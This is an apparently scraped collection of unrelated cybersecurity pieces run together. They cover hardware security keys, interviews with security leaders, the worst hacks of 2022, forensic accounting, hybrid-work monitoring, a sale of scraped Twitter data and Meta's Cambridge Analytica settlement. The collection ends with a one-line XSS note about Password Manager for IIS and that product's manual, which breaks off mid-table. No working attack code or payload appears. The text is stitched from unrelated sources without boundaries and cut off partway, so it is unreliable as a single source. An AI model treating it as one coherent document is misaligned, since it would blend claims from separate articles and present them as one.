Any multifactor authentication adds protection, but a physical token is the best bet when it really counts.

In August,  the internet infrastructure company Cloudflare was one of hundreds of targets in a massive criminal phishing spree that succeeded in breaching numerous tech companies. While some Cloudflare employees were tricked by the phishing messages, the attackers couldn't burrow deeper into the company's systems. That's because, as part of Cloudflare's security controls, every employee must use a physical security key to prove their identity while logging into all applications. Weeks later, the company announced a collaboration with the hardware authentication token-maker Yubikey to offer discounted keys to Cloudflare customers. 

Cloudflare wasn't the only company high on the security protection of hardware tokens, though. Earlier this month, Apple announced hardware key support for Apple IDs, seven years after first rolling out two-factor authentication on user accounts. And two weeks ago, the Vivaldi browser announced hardware key support for Android.

The protection isn't new, and many major platforms and companies have for years supported hardware key adoption and required that employees use them as Cloudflare did. But this latest surge in interest and implementation comes in response to an array of escalating digital threats.

“Physical authentication keys are some of the most effective methods today for protecting against account takeovers and phishing,” says Crane Hassold, director of threat intelligence at Abnormal Security and a former digital behavior analyst for the FBI. “If you think about it as a hierarchy, physical tokens are more effective than authentication apps, which are better than SMS verification, which is more effective than email verification.” 

Hardware authentication is very secure, because you need to physically possess the key and produce it. This means that a phisher online can't simply trick someone into handing over their password, or even a password plus a second-factor code, to break into a digital account. You already know this intuitively, because this is the whole premise of door keys. Someone would need your key to unlock your front door—and if you lose your key, it's usually not the end of the world, because someone who finds it won't know which door it unlocks. For digital accounts, there are different types of hardware keys that are built on standards from a tech industry association known as the FIDO Alliance, including smart cards that have a little circuit chip on them, tap cards or fobs that use near-field communication, or things like Yubikeys that plug into a port on your device.

You likely have dozens or even hundreds of digital accounts, and even if they all supported hardware tokens it would be difficult to manage physical keys for all of them. But for your most valuable accounts and those that are a fallback for other logins—namely, your email—the security and phishing resistance of hardware keys can mean significant peace of mind.

Meanwhile, after years of work, the tech industry finally took major steps in 2022 toward a long-promised passwordless future. The move is riding on the back of a technology called “passkeys” that are also built on FIDO standards. Operating systems from Apple, Google, and Microsoft now support the technology, and many other platforms, browsers, and services have adopted it or are in the process of doing so. The goal is to make it easier for users to manage their digital account authentication so they don't use insecure workarounds like weak passwords. As much as you might wish it, though, passwords aren't going to disappear anytime soon, thanks to their sheer ubiquity. And amid all the buzz about passkeys, hardware tokens are still an important protection option.

“FIDO has been positioning passkeys somewhere between passwords and hardware-based FIDO authenticators, and I think that’s a fair characterization,” says Jim Fenton, an independent identity privacy and security consultant. “While passkeys will probably be the right answer for many consumer applications, I think hardware-based authenticators will continue to have a role for higher-security applications, like for staff at financial institutions. And more security-focused consumers should also have the option to use hardware-based authenticators, particularly if their data has previously been breached, if they have a high net worth, or if they are just concerned about security.”

While it may feel daunting at first to add one more best practice to your digital security to-do list, hardware tokens are actually easy to set up. And you'll get plenty of mileage from just using them on a couple of, ahem, _key_ accounts.

The Password Isn’t Dead Yet. You Need a Hardware Key

Security leaders from a media corporation, a commercial real estate company, and an automotive technology company share how they address cyber-risk.

Every organization is at risk of a cyberattack, but each organizations addresses risk differently. No one expects SMBs to take the same approach to cybersecurity as a large enterprise, or a legacy organization to have the same appetite for risk as a startup. Similarly, how an organization defends itself from attack depend on various factors, including its size, type of industry, supply chain resources, approach to outsourcing and remote work, and global presence.

Security leaders from three very different industries sat down with Dark Reading to discuss their respective cybersecurity programs.

John McClure is the CISO at Sinclair Broadcast, a major new and sports broadcasting provider in the United States, with nearly 200 televisions stations, streaming and digital platforms, and almost two dozen sportscasts. McClure says that while Sinclair faces many of the same cybersecurity threats that any organization faces, it is also considered part of the critical infrastructure because it carries emergency broadcast signals. One of the challenges that McClure has seen over the past five years is the disappearing network borders and finding ways to protect the network as the way people work continues to change.

Doug Shepherd is the senior director of the offensive security services team at Jones Lang LaSalle (JLL), a worldwide commercial real estate company with 90,000 employees in more than 60 countries. For a long time, JLL was more of a brand than a company, Shepherd explains, but in recent years, it has become more cohesive and working together under the JLL model. The company's cybersecurity concerns revolve around integrating all the different office networks into a unified model and consolidating individual security practices into one companywide policy, Shepherd says.

Luis Cunha is the director of security engineering at Aptiv, an automotive technology company with 170,000 employees in 165 manufacturing plants around the world. Operational technology security is as important to Aptiv as information technology, with endpoint security across all technologies a major concern, Cunha says.

**Size of Security Team**

There is no "right" size when it comes to the security team. Some organizations have large teams, and others partner with third-party providers to offset small teams. That difference is very clear with Sinclair, JLL, and Aptiv.

When Shepherd first came to JLL, most security was outsourced, but now there are 100 people on the security team, he says. However, Shepherd believes the team is a little undersized considering the size of the company.

Outsourcing in such a distributed company meant that each office was setting its own policies. JLL's focus on unifying security is driving its decision to move away from outsourcing. The goal is to reduce its reliance on outsourcing and eventually bring in contractors who work directly with the security staff, Shepherd says.

Sinclair's McClure didn't provide exact numbers — he just says his security team meets the industry average. At Sinclair, security is handled both in-house and outsourced. Sinclair relies on outsourcing for skills that are difficult to recruit and retain in-house, such as threat hunting, McClure says.

And then there is Aptiv, with 35 people on its security team — up from five on the engineering team a year ago, according to Cunha. Cunha thinks Aptiv has outsourced too much, which has an impact on the organization's agility and flexibility. When you outsource, you lose the ability to change and react to security problems quickly, Cunha says.

**Investing in Security Tech**

What kind of security technologies an organization invests in depends on factors such as regulatory and compliance requirements, the type of threats the organization sees, and its technology stack. As organizations move more of their operations to the cloud, they are investing in cloud security. With the shift to distributed computing, identity becomes an even more critical area of focus.

McClure says Sinclair is investing in a number of technologies, including endpoint detection and response (EDR), extended detection and response (XDR), and endpoint security, with an emphasis on identity and cloud security.

The broadcasting provider is also relying on automation to support the volume and velocity of data that is driven across its networks, says McClure. While some of the automation capabilities are native to the technology in use, the company also utilizes security orchestration, automation, and response (SOAR) technologies across multiple platforms.

In contrast, automation is in "very early days" for JLL, Shepherd says, as the organization moves away from outsourcing to in-house security. The company is focusing on endpoint and cloud security, and that is also where the focus is for automation. Shepherd is designing automation that pulls data from every endpoint every 15 minutes to look for indicators of risk in real time.

In the past, security was siloed at Jones Lang LaSalle, so the current focus is to set up technology that will allow the security team to have better visibility into the whole environment, Shepherd says.

Aptiv's focus is a little different, as the company is looking to adopt technology that brings more security efficiency and quality, with a greater focus on secure access service edge (SASE), Cunha says. Aptiv also invests in operational technology security for its manufacturing plants. There are a lot of different vendors for both types of security, and a goal for Cunha is better consolidation of technology and vendor solutions. Orchestration and automation tools play a very important role integrating security tools.

**Road to Data-Driven Security**

As far as Aptiv's Cunha is concerned, you can't have orchestration and automation without solid data analytics. Engineering teams use data analytics to improve security tools, Cunha says, bringing search capabilities to the SOC. Cunha's team performs its own data analytics rather than relying on a platform.

Like automation, data analytics is still in the early stages at JLL, but that doesn't mean data is not still useful, Shepherd says. JLL uses analytics to help determine what’s happening on the perimeter, he says.

Data analytics are used to control coverage and control efficiency, as it helps Sinclair understand the business and the assets that need to be protected, McClure says.

**Biggest Security Concerns**

Ransomware is the threat that keeps Shepherd up at night. It is the biggest concern for JLL because of how it disrupts business operations, he says.

Aptiv's Cunha's worries center around threats that impact data liability and organizational reputation, he says. While phishing is a common attack vector, Cunha also has to contend with lesser-known threats against operational technologies.

For McClure, ransomware and cybercrime are the biggest concerns, but he points out that cyber threats have not become more sophisticated. Instead, he thinks the barrier to entry for attackers has gotten lower, and as a result, there are more attacks. The attack vectors themselves, he says, haven't changed much over the years, and cybercriminals are using the same methods to get into the system.

It is the volume of attacks that is the greater challenge for organizations, McClure says, not increased sophistication in attacks.

3 Industries, 3 Security Programs

The year was marked by sinister new twists on cybersecurity classics, including phishing, breaches, and ransomware attacks.

With the pandemic evolving into an amorphous new phase and political polarization on the rise around the world, 2022 was an uneasy and often perplexing year in digital security. And while hackers frequently leaned on old chestnuts like phishing and ransomware attacks, they still found vicious new variations to subvert defenses.

Here's WIRED's look back on the year's worst breaches, leaks, ransomware attacks, state-sponsored hacking campaigns, and digital takeovers. If the first years of the 2020s are any indication, the digital security field in 2023 will be more bizarre and unpredictable than ever. Stay alert, and stay safe out there.

For years, Russia has pummeled Ukraine with brutal digital attacks causing blackouts, stealing and destroying data, meddling in elections, and releasing destructive malware to ravage the country's networks. Since invading Ukraine in February, though, times have changed for some of Russia's most prominent and most dangerous military hackers. Shrewd long-term campaigns and grimly ingenious hacks have largely given way to a stricter and more regimented clip of quick intrusions into Ukrainian institutions, reconnaissance, and widespread destruction on the network—and then repeated access over and over again, whether through a new breach or by maintaining the old access. The Russian playbook on the physical battlefield and in cyberspace seems to be the same: one of ferocious bombardment that projects might and causes as much pain as possible to the Ukrainian government and its citizens.

Ukraine has not been digitally passive during the war, though. The country formed a volunteer “IT Army” after the invasion, and it, along with other actors around the world, have mounted DDoS attacks, disruptive hacks, and data breaches against Russian organizations and services.

Over the summer, a group of researchers dubbed 0ktapus (also sometimes known as “Scatter Swine”) went on a massive phishing bender, compromising nearly 10,000 accounts within more than 130 organizations. The majority of the victim institutions were US-based, but there were dozens in other countries as well, according to researchers. The attackers primarily texted targets with malicious links that led to fake authentication pages for the identity management platform Okta, which can be used as a single sign-on tool for numerous digital accounts. The hackers' goal was to steal Okta credentials and two-factor authentication codes so they could get access to a number of accounts and services at once.

One company hit during the rampage was the communications firm Twilio. It suffered a breach at the beginning of August that affected 163 of its customer organizations. Twilio is a big company, so that only amounted to 0.06 percent of its clients, but sensitive services like the secure messaging app Signal, two-factor authentication app Authy, and authentication firm Okta were all in that slice and became secondary victims of the breach. Since one of the services Twilio offers is a platform for automatically sending out SMS text messages, one of the knock-on effects of the incident was that attackers were able to compromise two-factor authentication codes and breach the user accounts of some Twilio customers. 

As if that wasn't enough, Twilio added in an October report that it was also breached by 0ktapus in June and that the hackers stole customer contact information. The incident highlights the true power and menace of phishing when attackers choose their targets strategically to magnify the effects. Twilio wrote in August, “we are very disappointed and frustrated about this incident.”

In recent years, countries around the world and the cybersecurity industry have increasingly focused on countering ransomware attacks. While there has been some progress on deterrence, ransomware gangs were still on a rampage in 2022 and continued to target vulnerable and vital social institutions, including health care providers and schools. The Russian-speaking group Vice Society, for example, has long specialized in targeting both categories, and it focused its attacks on the education sector this year. The group had a particularly memorable showdown with the Los Angeles Unified School District at the beginning of September, in which the school ultimately took a stand and refused to pay the attackers, even as its digital networks went down. LAUSD was a high-profile target, and Vice Society may have bitten off more than it could chew, given that the system includes more than 1,000 schools serving roughly 600,000 students. 

Meanwhile, in November, the US Cybersecurity and Infrastructure Security Agency, the FBI, and the Department of Health and Human Services released a joint warning about the Russia-linked ransomware group and malware maker known as HIVE. The agencies said the group's ransomware has been used to target over 1,300 organizations around the world, resulting in roughly $100 million in ransom payments from victims. “From June 2021 through at least November 2022, threat actors have used Hive ransomware to target a wide range of businesses and critical infrastructure sectors,” the agencies wrote, “including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health.”

The digital extortion gang Lapsus$ was on an intense hacking spree at the beginning of 2022, stealing source code and other sensitive information from companies like Nvidia, Samsung, Ubisoft, and Microsoft and then leaking samples as part of apparent extortion attempts. Lapsus$ has a sinister talent for phishing, and in March, it compromised a contractor with access to the ubiquitous authentication service Okta. The attackers appeared to be based primarily in the United Kingdom, and at the end of March, British police arrested seven people in association with the group and charged two at the beginning of April. In September, though, the group flared back to life, mercilessly breaching the ride-share platform Uber and seemingly the _Grand Theft Auto_ developer Rockstar as well. On September 23, police in the UK said they had arrested an unnamed 17-year-old in Oxfordshire who seems to be one of the individuals previously arrested in March in connection with Lapsus$.

The beleaguered password manager giant LastPass, which has repeatedly dealt with data breaches and security incidents over the years, said at the end of December that a breach of its cloud storage in August led to a further incident in which hackers targeted a LastPass employee to compromise credentials and cloud storage keys. The attackers then used this access to steal some users' encrypted password vaults—the files that contain customers' passwords—and other sensitive data. Additionally, the company says that “some source code and technical information were stolen from our development environment” during the August incident. 

LastPass CEO Karim Toubba said in a blog post that in the later attacks, hackers compromised a copy of a backup that contained customer password vaults. It is not clear when the backup was made. The data is stored in a “proprietary binary format" and contains both unencrypted data, like website URLs, and encrypted data, like usernames and passwords. The company did not provide technical details about the proprietary format. Even if LastPass's vault encryption is strong, hackers will attempt to brute-force their way into the password troves by attempting to guess the “master passwords” that users set to protect their data. With a strong master password, this may not be possible, but weak master passwords could be at risk of being defeated. And since the vaults have already been stolen, LastPass users can't stop these brute-force attacks by changing their master password. Users should instead confirm that they have deployed two-factor authentication on as many of their accounts as they can, so even if their passwords are compromised, attackers still can't break in. And LastPass customers should consider changing the passwords on their most valuable and sensitive accounts.

The Worst Hacks of 2022

It's time companies build a multilayered approach to cybersecurity.

As global cyberattacks continue to become more sophisticated, so should corporations' risk mitigation strategies. Of these high-stakes attacks, financial motivation is the most common reason for cybercriminals to target businesses, with the IBM "Cost of a Data Breach" report finding that the average breach in 2022 cost organizations up to $4.35 million in damages. With consequences this detrimental to business, it's critical that companies build a multilayered approach to cybersecurity with a number of experts involved to ensure effective prevention, detection, and response to cyber threats.

To create the most effective cyber-risk prevention and recovery team, companies must leverage financial and technology talent to collaborate on prevention strategies. While cybersecurity professionals focus on the who, what, where, and how of a potential breach, accountants can monitor the potential impacts to a corporation's funds and controls to determine priority functions and vulnerable financial business data that need safeguarding. This is typically done most effectively by forensic accountants who are trained in auditing and investigating risk factors within the finances of individuals or businesses. When these two roles find synergy, they can combat even the most complex of corporate cybercrimes.

Here are some of the ways these professionals can effectively work together to prevent and recover from highly intelligent attacks on financial data.

**Prevention**

Proper prevention of financial cybercrimes takes a diversified skill set, tapping into financial and IT specialties to create the strongest possible defenses against breaches. For cyber professionals, this includes identifying and closing gaps in internal controls and technologies, and implementing the proper safeguards — from two-factor authentication programs to file encryptions and more. Meanwhile, forensic accountants are well-versed on corporate finances and have the ability to detect the misappropriation of funds before losses are incurred.

Cyber professionals are also invaluable assets to financial teams in alerting them to new threats as the digital landscape changes so that proper preventative measures can be implemented. For example, there is a new trend of hackers using Meta business accounts as an entry point to breach financial information. This typically involves the stealing of customer credit card and bank information when they make transactions through the social media platform.

Obviously, suffering from an attack of this kind can lead to a damaged reputation, monetary consequences, and a loss of consumer trust. Establishing open lines of communication between cyber professionals and those in charge of monitoring business transactions can mean that forensic accountants know what threats they need to be wary of and can make business decisions that are in the best interest of their clients and customers. Also, it can ensure quicker detection of odd transactional activity for early intervention.

Instituting safeguards to proactively defend financial information — and consistently reviewing and updating them — can help to keep corporate funds safe in an era where sophisticated cybercriminals can steal financial information at the click of a key.

**Recovery**

Even the best laid plans can fail, especially when the enemy continues to get smarter and stealthier as technology evolves. That's the case when it comes to cybercrime, so planning to fail is just as important as working to avoid failure.

Collaboration between cybersecurity professionals and forensic accountants can ensure that swift, immediate defenses are deployed when an attack is executed and that the damage to a business's financial bottom line is as minimal as possible.

In the event of a breach, these professionals must work together to block the attacker and protect as much data and capital as they can. For example, a seasoned forensic accountant brings experience and knowledge of the many forms of corporate fraud, as well as the necessary steps to employ investigative techniques to spot trends and outliers in large data sets as they develop. Immediately upon noticing suspicious activity, they can alert their company's cyber team to quickly employ a variety of techniques to close the digital path to systems while they investigate.

While losses are not ideal, they are difficult to avoid once a cybercrime is effectively executed, even if it was caught and stopped quickly. Post-incident, it is the task of forensic accountants to calculate potential losses, assess and disclose accounting requirements, and assist the cyber team with evidence collection for insurance claim purposes.

Generally, forensic accountants and cybersecurity professionals have the same goal: to safeguard important information. When they use their unique skill sets to collaborate effectively, a corporation has the best chance of evading the consequences of a devastating cyberattack.

Why Cyber Pros and Forensic Accountants Should Work Together to Mitigate Security Risk

Digital transformation initiatives are challenging because IT still has to make sure performance doesn't suffer by making applications available from anywhere.

Over the past two years, many businesses have adopted hybrid work environments and begun migrating mission-critical applications to the cloud to allow their hybrid workforce to work from anywhere. However, combining working from anywhere with migrating applications such as Salesforce, SAP, Microsoft 365, and ServiceNow was an IT challenge because the networks needed to be improved.

The challenge was to reduce downtime and increase end user productivity. Even minor outages can impact operations, productivity, and profits, with Gartner suggesting that unplanned downtime costs US$5,600 per minute. To reduce such costs, businesses must quickly identify the root cause of outages and turn to intelligent digital experience monitoring solutions.

    

45 minutes of downtime costs more than a quarter million dollars. (Source: Gartner)

Businesses spent time rethinking the digital transformation journey to ensure they were delivering excellent performance while still securing users, workloads, and device communications over any network. As businesses look forward to 2023, three top digital experience monitoring trends emerge:

**Increase Hybrid Workforce Productivity**

Many businesses have accelerated digital business initiatives over the past couple of years to retain talent and optimize productivity. Companies like Zoom, Facebook, Google, and Apple adjusted their work-from-home policies to allow 100% remote and hybrid formats. Even healthcare businesses have enabled staff to work remotely, offering more telemedicine options and limiting in-person appointments.

Remote work is here to stay for the foreseeable future, as employees have proven that this hybrid model is possible. However, IT teams need to focus on keeping the business operational while ensuring excellent end user productivity. Supporting hybrid workers means having fast and reliable insights as issues arise from various devices, applications, and networks being used. For example, help desk and network operations teams need to know whether the user is having an issue with the local Wi-Fi connection or if there are problems with any of the network hops between the user's machine and where the application is hosted.

As hybrid workers become more adept at working from home, they learn basic connectivity troubleshooting steps, such as rebooting the home Wi-Fi router. In 2023, businesses need to be able to quickly recommend ways to solve end user problems without requiring users to open support tickets. IT teams need a global view of their environment to pinpoint areas of focus, and then to actively look at specific users to understand their challenges. This will reduce IT troubleshooting time while increasing end user productivity.

**Faster Mean Time to Resolution (MTTR) With Smart Technologies**

Service desk and network operations teams must look past traditional castle-and-moat architecture, change their work-from-home policies, and provide users with fast and reliable access from anywhere. To increase productivity, IT teams must diagnose an end user's situation quickly and confidently. They must analyze each device, dedicated network path, and application response times. That's the only way to grasp the end user's dilemma fully. To effectively analyze data from these segments and provide a meaningful response, IT teams will benefit from the help of AI and machine learning (ML).

In 2023, we’ll see continued growth in AI/ML-based technologies as they ingest more data and learn to apply insights across the board. The key will be the amount of data being ingested and analyzed. The intelligence will come from solutions that combine multiple facets of end user experience. For example, providing secure, fast, and reliable connections with the ability to triage issues based on collected data will separate solutions that offer combined capabilities from ordinary point products.

The FIFA World Cup used AI to produce some compelling projections . Imagine if the players knew exactly where to position the ball for a goal—it would be game-changing! Similarly, if service desk and network operations teams could similarly leverage AI, they would be able to quickly triage end user issues In 2023, let's spend less time with traditional operations troubleshooting guides and more with AI-based solutions.

As IT teams look to better understand their environments, they’ll need intelligent systems to provide trends and patterns holistically. In 2023, AI-based solutions should evolve to find trends and systematic issues. For example, imagine a view into your network that classified which ISPs were the most troublesome globally. You could create a plan to move off those ISPs or position them as backups, for instance. You could also use this knowledge to negotiate better terms with the ISP. Armed with AI-based insights, IT teams would have opportunities to optimize their environments and reduce potential outage scenarios.

**Reduce IT Costs With Monitoring Plus Security Solutions**

Macroeconomics will focus on reducing overall costs and increasing flexibility (consolidation). In 2023, businesses will not only look to remove siloed monitoring solutions around devices, networks, and applications; they will also look for solutions that combine monitoring and security. These two services fit together nicely.

With security issues on the rise, IT teams will continue to face pressure from executives on what happened, end user impact, and prevention techniques. The challenge will be trying to reduce costs while gaining this intelligence. Cloud-based solutions make it easier for IT teams to get started small, get comfortable with the solution, and then scale.

For example, when the economy shifts, more businesses look to consolidate through mergers and acquisitions. However, these business initiatives aren’t always predictable, and IT must ensure solutions are in place that can easily handle these shifts. With secure cloud-based solutions, IT teams can quickly focus on security and monitoring, and then scale while controlling costs .

One more way to reduce costs in 2023 will be to focus on using existing IT service management tools. For example, many businesses use ServiceNow—wouldn't it be great if digital experience monitoring could easily integrate into these solutions? IT teams could more easily adopt new digital experience monitoring solutions without changing their entire workflow. Continuing to reduce costs is all about intelligently gaining insights with smarter integrations.

Read more _Partner Perspectives_ from Zscaler.

Securing and Improving User Experience for the Future of Hybrid Work

By Habiba Rashid
The threat actor claims that Twitter data was "scraped via a vulnerability."
This is a post from HackRead.com Read the original post: 400 Million Twitter Users’ Scraped Info Goes on Sale!

The sample data seen by Hackread.com shows that the sold information also includes records on top celebrities and political figures, such as Democratic Rep. Alexandria Ocasio-Cortez and Bollywood’s Salman Khan.

On December 23, 2022, a threat actor going by the handle “Ryushi” claimed to sell more than 400 million Twitter users’ personal details on BreachedForums, a cybercrime and hacking forum that surfaced as an alternative to the **now-seized Raidforums**.

As seen by Hackread.com, the sample data attached to the post contains private email addresses, usernames, follower counts, creation dates, and, in certain cases, the user’s phone numbers.

The sample data also contains a variety of well-known user accounts including New York Democratic Rep. Alexandria Ocasio Cortez, Ethereum cryptocurrency founder Buterin, Indian actor Salman Khan and cybersecurity reporter Brian Krebs. 

> Hey @elonmusk, since you don't seem to have much a media/comms team anymore, can you address the apparently legitimate claim that someone scraped & is now selling data on hundreds of millions of Twitter accounts? Maybe it didn't happen on your watch, but you owe Twitter a reply.
> 
> — briankrebs (@briankrebs) December 27, 2022

It is worth mentioning that the latest data leak came just one month after a hacker leaked the contact and personal details of over **5.3 million Twitter users** online. Both the earlier and latest incidents are now being **investigated** by Irish authorities.

The threat actor stated in the post that the data had been “scraped via a vulnerability” but did not specify any further details.

Further, they openly advised the **CEO of the social media giant, Elon Musk**, that he should buy this data directly from the hacker instead of “paying $276 million USD in GDPR breach fines like Facebook did” but does not specify a price at which the data is being sold.

Sample data seen and analyzed by Hackread.com (Image credit: Waqas – Hackread.com)

Offering to conduct the “deal” through a middleman, the threat actor states, “After that, I will remove this thread and will not sell this info again. And data won’t be sold to anyone else, which will stop a lot of celebrities and politicians from Phishing, Crypto scams, Sim swapping, Doxxing, and other things that will make your users lose trust in you as a company and thus stunt the current growth and hype.”

Researchers who have seen the sample data believe that this alleged data leak is the result of an API flaw which allowed the threat actor to search any email addresses or phone numbers and return a **Twitter** profile.

This attack followed only months after Twitter entered into a **consent order** with the US Federal Trade Commission binding it to maintain a privacy and information security program for the next two decades.

The agreement ended a federal investigation into Twitter’s use of phone numbers and email addresses for advertising purposes when they were collected to be used for multi-factor authentication. Twitter also paid a $150 million civil penalty.

Therefore, if this data breach is verified, the impact on Twitter would be drastic both financially and socially. At the time of writing, the data was still up for grabs.

1.  **Hackers leak scraped data of 87,000 GETTR users**
2.  **Nearly 500 million WhatsApp User Records Sold Online**
3.  **Leaky Server Exposing Scraped Data of 150,000 Mastodon Users**
4.  **Leaked: 235m Instagram, TikTok, YouTube users’ scraped records**
5.  **Meta Fined €265 million in Facebook Data Scraping Case in the EU**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

400 Million Twitter Users’ Scraped Info Goes on Sale!

Meta Platforms, the parent company of Facebook, Instagram, and WhatsApp, has agreed to pay $725 million to settle a long-running class-action lawsuit filed in 2018.
The legal dispute sprang up in response to revelations that the social media giant allowed third-party apps such as those, including Cambridge Analytica to access users' personal information without their consent for political

Meta Platforms, the parent company of Facebook, Instagram, and WhatsApp, has agreed to pay $725 million to settle a long-running class-action lawsuit filed in 2018.

The legal dispute sprang up in response to revelations that the social media giant allowed third-party apps such as those, including Cambridge Analytica to access users' personal information without their consent for political advertising.

The proposed settlement, first reported by Reuters last week, is the latest penalty paid by the company in the wake of a number of privacy mishaps through the years. It still requires the approval of a federal judge in the San Francisco division of the U.S. District Court.

It's worth noting that Facebook previously sought to dismiss the lawsuit in September 2019, claiming users have no legitimate privacy interest in any information they make available to their friends on social media.

The data harvesting scandal, which came to light in March 2018, involved a personality quiz app called "thisisyourdigitallife" that allowed users' public profiles, page likes, dates of birth, genders, locations, and even messages (in some cases) to be collected for building psychographic profiles.

The app was developed by an academic researcher named Aleksandr Kogan and his company Global Science Research (GSR) in 2013 as part of a collaboration with Cambridge Analytica, a British political consultancy firm owned by SCL Group.

While around 300,000 users are said to have taken the psychological test, the app collected the private data of those who installed the app as well as their Facebook friends without seeking explicit permission, leading to a dataset spanning 87 million profiles.

thisisyourdigitallife was subsequently banned by Facebook in 2015 for contravention of its platform policy, with the company also sending a legal request to GSR and Cambridge Analytica to delete the improperly acquired data.

Only it turned out later that the unauthorized data was never purged to begin with and that the consulting firm, now defunct, used the personal information from millions of Facebook accounts for purposes of voter profiling and targeting ahead of the 2016 U.S. presidential election.

"This was a breach of trust between Kogan, Cambridge Analytica, and Facebook," CEO Mark Zuckerberg said at the time. "But it was also a breach of trust between Facebook and the people who share their data with us and expect us to protect it."

The bombshell expose fueled government scrutiny on both sides of the Atlantic, prompting the company to settle with the U.S. Securities and Exchange Commission (SEC) and the U.K. Information Commissioner's Office (ICO) in 2019.

The same year, Meta was also slapped with a record-breaking $5 billion fine following a probe initiated by the U.S. Federal Trade Commission (FTC) into its privacy practices and to settle charges that the firm undermined users' choice to control the privacy of their personal information.

Meta – which has not admitted to any wrongdoing in relation to the problematic data-sharing practice – has since taken steps to curtail third-party access to user information.

The tech giant further rolled out a tool called Off-Facebook Activity for users to "see a summary of the apps and websites that send us information about your activity, and clear this information from your account if you want to."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Facebook to Pay $725 Million to settle Lawsuit Over Cambridge Analytica Data Leak

Password Manager for IIS 2.0 has a cross-site scripting (XSS) vulnerability via the /isapi/PasswordManager.dll ResultURL parameter.

**Year 2000 statement**

Password Manager for IIS does not include any time or date oriented functionality or code. Thus, it can be safely assumed that the product itself will perform well in the year 2000 and above.

However, it is dependant on the operating system and web server it is running on. Please see the supplying vendors notices for their product's year 2000 compliance. In the case of Password Manger for IIS, this is mainly Microsoft (which can be found at http://www.microsoft.com). Other vendor information might also apply, e. g. if you use a third party IP stack.

**Installation**

Password Manager for IIS is high performing tool using only minimal system resources. It also doesn't require an extended installation process.

**System Requirements**

This product is compatible with all versions of Microsoft IIS. It supports Windows NT 4, Windows 2000, Windows 2003 and Windows XP.

Active Directory users please note: Password Manager for IIS does run without any problems on Windows 2000. Many users use it with great success in Active Directory environments. However, Password Manager uses NT domain API calls to change the password, so you need to refer to the short name to all objects and domains.

**The Installation Process**

Actual installation is very straightforward

1.  unzip the install set
2.  copy PasswordManager.dll (the ISAPI extension DLL) to any web directory on your IIS you like. Make sure, you have excute permissions inside IIS for this directory set (not only scripting!).
3.  copy the sample password change dialog and customize it according to your needs (or create your own from scratch).

The product does not perform or require any registry modifications.

**Uninstallation**

There is no need for any formal uninstallation process. Simply delete the ISAPI extension DLL (PasswordManager.dll) as well as any page you are using Password Manger for IIS on.

**Usage**

Password Manager for IIS is a standard ISAPI extension callable from any HTTP form. You can include it into your web site by creating a simple (or sophisticated ;-) ) web form with your favourite HTML editor (like Microsoft Frontpage or Macromedia DreamWeaver).

The "ACTION" tag of the html form must point to the PasswordManager.dll ISAPI extension. Be sure to specify the correct path to the DLL. This is depending on where you copied the DLL to and where your actual form resides. If ever in doubt, use a full name like: http://www.yourserver.com/yourdirectory/passwordmanger.dll. The form needs to include the following fields:

**FieldName**

**Used for**

LANGUAGE

Select language for response text generated by Password Manager for IIS. Supported values are "DE" for German, "BR" for Brazilian Portugese and "EN" for English. This field can be omitted and defaults to English.

DOMAIN

Name of the NT Domain that is to be used for password changes. Only users from this domain can change their password (if you have multiple domains, the users needs to enter the correct one or select it from a list box).

Please note: if you run Password Manager for IIS in a workgroup environmen, this parameter must hold the computer name, NOT the workgroup name!

This field is mandatory.

RESULTURL

The URL PasswordManager redirects to after it tried to change the password. This URL is called from within Password Manager. We recommend it to be a fully qualified name (e.g. starting with HTTP). This URL will be passed the outcome of the operation as parameter "state". It is up to the page residing at this URL to decode "state" and provide feedback to the user. The URL is called as follows:

RESULTURL?state=OperationStatus

See appendix for statuses.

Please note: unregistered versions of Password Manager will redirect after a 10 second delay only.

If this field is not specified, Password Manager provides a default status form.

USER

NT User name (without domain part) of the users who's password needs to be changed.

OLDPWD

Old password

NEWPWD

New password

NEWPWDCONFIRM

Confirmation of new password. NEWPWD & NEWPWDCONFIRM need to be identical, otherwise password manager for IIS does not change the users' password.

**Sample**

The following is a simple sample form. It assumes that PasswordManager is stored in a directory named "ISAPI" that is on the same directory level as the one the form is stored in. One example might be:

"<web-root>/forms" for the form's html file and  
"<web-root>/ISAPI" for the extension DLL

<html>  
										<head>  
										<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">  
										<title>Change Domain Password</title>  
										</head>  
										<body>  
										<p><strong><big>Change Domain 
										Password</big></strong></p>  
										<form method="post" action="../isapi/PasswordManager.dll">  
										<input type="hidden" name="Language" value="EN">  
										<input type="hidden" name="Domain" value="YOURNTDOMAIN">  
										<div align="left"><table border="0" cellpadding="0" 
										cellspacing="0">  
										<tr>  
										<td><strong>User Name</strong></td>  
										<td><input type="text" name="User" size="20"></td>  
										</tr>  
										<tr>  
										<td><strong>Current Password</strong></td>  
										<td><input type="password" name="OldPwd" size="20"></td>  
										</tr>  
										<tr>  
										<td><strong>New Password</strong></td>  
										<td><input type="password" name="NewPwd" size="20"></td>  
										</tr>  
										<tr>  
										<td><strong>New Password Confirmation</strong></td>  
										<td><input type="password" name="NewPwdConfirm" 
										size="20"></td>  
										</tr>  
										<tr>  
										<td><strong></strong></td>  
										<td><input type="submit" value="Change Password!">  
										    <input type="reset">  
										</td>  
										</tr>  
										</table>  
										</div>  
										</form>  
										</body>  
										</html>  
									

The example above is for a simple change password dialog with no customised result page. Inside the install set is a more complex sample.

These sample assumes that the sample-form.htm and MyResultPage.asp files are copied in a web root. There should be a directory named "isapi" in wich PasswordManger.dll resides. Sample-form.htm is basically the same sample as above, but references MyResultPage.asp as a customized result page. Once PasswordManager has done it's actions, it calls this page with a parameter "state". MyResultPage.asp evaluates this "state" variable and displays an appropriate message. You are free to do whatever you want inside this result page.

Please note that the unregistered version of Password Manager has a delay of 10 seconds before redirecting to the result page. The registered version will immediately redirect.

**Status Codes**

The following status codes are used by Password Manager to indicate the outcome of the change password operation:

**Code**

**Meaning**

0

success (all others indicate failure)

5 or 53

PDC not found.  
Most probable causes are:

*   Domain name misspelled
*   PDC actually down (powered off or otherwise offline)
*   If Password Manager for IIS is to be used in a Workgroup environment, Parameter DOMAIN must hold the computer name, NOT the workgroup name.
*   User restriction "Can't change password" checked in user manager

86

Old Password incorrect

2245

New password is too short.

2221

Invalid Username. Most probably typo, user account does not exist.

4294967295

